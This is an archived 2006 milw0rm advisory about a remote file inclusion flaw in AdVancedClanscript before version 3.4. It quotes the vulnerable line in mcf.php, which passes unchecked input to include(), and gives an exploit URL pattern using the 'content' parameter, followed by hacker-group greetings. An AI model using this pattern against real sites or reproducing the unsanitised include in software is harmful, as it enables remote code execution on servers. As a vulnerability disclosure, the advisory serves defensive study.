29 lines
No EOL
917 B
Text
29 lines
No EOL
917 B
Text
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
* .___.__
|
|
* ___ ___ __| _/| |__
|
|
* \ \/ // __ | | | \
|
|
* > </ /_/ | | Y \
|
|
* /__/\_ \____ | |___| /
|
|
* \/ \/ \/ discovered by xdh
|
|
*
|
|
*
|
|
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
* {Critical Level}: Dangerous
|
|
* {Class}: Remote File Inclusion
|
|
* {Venedor site}: http://avc.x.philipwette.de/
|
|
* {Version}: AdVancedClanscript < 3.4
|
|
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
*
|
|
* VUln:
|
|
* Filename: mcf.php
|
|
* Line: 70:include("$content");
|
|
*
|
|
* usage: http://www.test.com/path/mcf.php?content=xpl
|
|
*
|
|
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
* greetz ² morgan, nethug-47, r00t, tz4r, x2k,
|
|
* jack, id and many others
|
|
* /server -m irc.root.net.ve -j #morgan
|
|
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
# milw0rm.com [2006-09-24] |